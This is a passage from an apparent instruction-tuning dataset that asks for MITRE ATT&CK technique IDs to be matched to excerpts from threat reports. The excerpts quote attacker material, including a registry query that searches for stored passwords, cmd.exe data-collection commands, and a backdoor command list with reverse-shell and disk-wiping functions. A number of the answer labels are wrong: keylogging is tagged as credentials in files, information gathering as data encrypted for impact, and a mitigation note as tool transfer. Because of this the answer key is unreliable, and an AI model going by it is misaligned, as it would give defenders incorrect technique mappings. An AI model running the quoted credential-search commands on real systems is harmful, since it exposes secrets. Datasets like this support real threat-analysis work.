monitored.", + "output": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "High resolution screenshots of specified process windows and when recording VoiceIP application audio", + "output": "- T1123: Audio Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To ensure its victim will use IE, it will terminate any process in-focus that is Chrome or Firefox, in hopes the victim will believe the browsers are \u201cmalfunctioning.\u201d Whenever a victim uses IE and browses to specific Brazilian banks or businesses, the malware will only then begin to log keystrokes", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the same time, Enc.exe will start the encryption routine and append \u201c. jcry \u201d as file extension to the encrypted file.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands.", + "output": "- T1136: Create Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The decrypted shellcode is dropped as a Microsoft Word plugin WLL into C:\\Users\\ADMINI~1\\AppData\\Roaming\\Microsoft\\Word\\STARTUP.", + "output": "- T1137: Office Application Startup" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries.", + "output": "- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes.", + "output": "- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file.", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "reg query HKCU /f password /t REG_SZ /s", + "output": "- T1552.002: Unsecured Credentials - Credentials in Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager", + "output": "- T1546.009: Event Triggered Execution - AppCert DLLs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "!ProcessList List running processes, including their PID, parent PID, executable name and priority !SendFileToServer Uploads a specified file to the C2 server !CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server", + "output": "- T1057: Process Discovery\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) Appendix C \u2014 OwaAuth web shell analysis OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) Table 4 lists the OwaAuth web shell commands available to the adversary", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) The following tools appear to be exclusive to TG-3390: OwaAuth web shell \u2014 A web shell and credential stealer deployed to Microsoft Exchange servers", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: SecureWorks) NetWire logs keystrokes and peripheral inputs into encoded files in the C:\\Users\\ Figure 3", + "output": "- T1056: Input Capture\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: SecureWorks) The \u201cWindows Folder.exe\u201d executable spawns and injects code into the legitimate notepad.exe Windows process (see Figure 2)", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "0x007CFABF video Desktop video recording 0x06E533C4 download Downloads executable and injects into new process 0x00684509 ammyy Ammyy Admin tool 0x07C6A8A5 update Updates self 0x0B22A5A7 \u00a0 Add/Update klgconfig (analysis incomplete) 0x0B77F949 httpproxy Starts HTTP proxy 0x07203363 killos Renders computer unbootable by wiping the MBR 0x078B9664 reboot Reboots the operating system 0x07BC54BC tunnel Creates a network tunnel 0x07B40571 adminka Adds new C2 server or proxy address for pseudo-HTTP protocol 0x079C9CC2 server Adds new C2 server for custom binary protocol 0x0007C9C2 user Creates or deletes Windows user account 0x000078B0 rdp Enables concurrent RDP (analysis incomplete) 0x079BAC85 secure Adds Notification Package (analysis incomplete) 0x00006ABC del Deletes file or service 0x0A89AF94 startcmd Adds command to the configuration file (see the Configuration section) 0x079C53BD runmem Downloads executable and injects directly into new process 0x0F4C3903 logonpasswords Send Windows accounts details to the C2 server 0x0BC205E4 screenshot Takes a screenshot of the desktop and sends it to the C2 server 0x007A2BC0 sleep Backdoor sleeps until specified date 0x0006BC6C dupl Unknown 0x04ACAFC3 \u00a0 Upload files to the C2 server 0x00007D43 vnc Runs VNC plugin 0x09C4D055 runfile Runs specified executable file 0x02032914 killbot Uninstalls backdoor 0x08069613 listprocess Returns list of running processes to the C2 server 0x073BE023 plugins Change C2 protocol used by plugins 0x0B0603B4 \u00a0 Download and execute shellcode from specified address 0x0B079F93 killprocess Terminates the first process found specified by name 0x00006A34 cmd Initiates a reverse shell to the C2 server 0x09C573C7 runplug Plugin control 0x08CB69DE autorun Updates backdoor Table 2: Supported Commands Configuration A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension", + "output": "- T1008: Fallback Channels\n- T1105: Ingress Tool Transfer\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll", + "output": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2.\u00a0\u00a0\u00a0\u00a0 The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3.\u00a0\u00a0\u00a0\u00a0 The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe\u00a0:\u00a0GUP, a free (LGPL) Generic Updater.\u00a0GUP is an open source binary used by Notepad++ for software updates", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1106: Native API\n- T1036: Masquerading\n- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "22 Keylogging and exfiltrating data The exfiltrated data is base64 that decodes into more custom encoded strings that appear to be \u201c/\u201d delimited", + "output": "- T1560: Archive Collected Data\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "37 38 zlib64.dll zlib32.dll Open source \u201czlib\u201d version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)", + "output": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "59 60 61 62 freeimage_32.dll freeimageplus_32.dll freeimage_64.dll freeimageplus_64.dll FreeImage open source library supports popular graphics image formats (ver 3.15.4 2012-10-27) (http://freeimage.sourceforge.net)", + "output": "- T1055: Process Injection\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague", + "output": "- T1125: Video Capture\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additional Features The Zyklon malware offers the following additional capabilities (via plugins): Browser Password Recovery Zyklon HTTP can recover passwords from popular web browsers, including: Google Chrome Mozilla Firefox Internet Explorer Opera Browser Chrome Canary/SXS CoolNovo Browser Apple Safari Flock Browser SeaMonkey Browser SRWare Iron Browser Comodo Dragon Browser FTP Password Recovery Zyklon currently supports FTP password recovery from the following FTP applications: FileZilla SmartFTP FlashFXP FTPCommander Dreamweaver WS_FTP Gaming Software Key Recovery Zyklon can recover PC Gaming software keys from the following games: Battlefield Call of Duty FIFA NFS Age of Empires Quake The Sims Half-Life IGI Star Wars Email Password Recovery Zyklon may also collect email passwords from following applications: Microsoft Outlook Express Microsoft Outlook 2002/XP/2003/2007/2010/2013 Mozilla Thunderbird Windows Live Mail 2012 IncrediMail, Foxmail v6.x - v7.x Windows Live Messenger MSN Messenger Google Talk GMail Notifier PaltalkScene IM Pidgin (Formerly Gaim) Messenger Miranda Messenger Windows Credential Manager License Key Recovery The malware automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero", + "output": "- T1003: OS Credential Dumping\n- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additional mitigations that could help to prevent attacks like these from succeeding in your environment include: Changing the default handler for \u201c.hta\u201d files in your environment so that they cannot be directly executed.hta\u201d files in your environment so that they cannot be directly executed", + "output": "- T1105: Ingress Tool Transfer\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ \u00a0folder", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1543.001: Create or Modify System Process - Launch Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system", + "output": "- T1140: Deobfuscate/Decode Files or Information\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism", + "output": "- T1064: Scripting\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All of these files reside in the victim\u2019s %TEMP% directory: Filename Description 9PT568.dat Contains victim unique identifier TPX498.dat Keystroke logs edg499.dat List of interesting files TPX499.dat Temporarily holds screenshot when given command by C2 up Temporarily contains downloaded file to be executed when given command by C2 \u00a0 Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers", + "output": "- T1036: Masquerading\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Amongst the downloaded files, \u00a0the fake .gif and .jpg files appear to be dependencies for the malware", + "output": "- T1105: Ingress Tool Transfer\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes", + "output": "- T1027: Obfuscated Files or Information\n- T1064: Scripting\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server: Directory listing of the user\u2019s Desktop folder using command: cmd.exe /c dir C:\\DOCUME~1\\\\Desktop\\ >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the user\u2019s recently accessed files using command: cmd.exe /c dir C:\\DOCUME~1\\\\Recent >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Directory listing of the system\u2019s %programfiles% folder using command: cmd.exe /c dir C:\\PROGRA~1\\ >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Systeminfo of the endpoint using command: cmd.exe /c systeminfo >> C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Copies the file ixe000.bin from: C:\\Documents and Settings\\\\Application Data\\Microsoft\\Windows\\UserProfiles\\ixe000.bin To: C:\\DOCUME~1\\\\APPLIC~1\\MICROS~1\\HNC\\1.hwp Registry key and value information for the current user\u2019s Run key (with information collected): HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Number of subkeys () Number of Values under each key including the parent Run key () Registry Run key enumeration by Gold Dragon", + "output": "- T1486: Data Encrypted for Impact\n- T1033: System Owner/User Discovery\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Apart for its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture", + "output": "- T1123: Audio Capture\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A shortcut file is generated in the following path: %TEMP%\\~Update.lnk This \u2018~Update.lnk\u2019 file is then copied to a filename of \u2018Windows help.lnk\u2019, which is placed in the startup path previously identified", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name", + "output": "- T1082: System Information Discovery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Assuming the victim opens the attachment, the infection process begins as described in the following section.Many of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate", + "output": "- T1056: Input Capture\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on 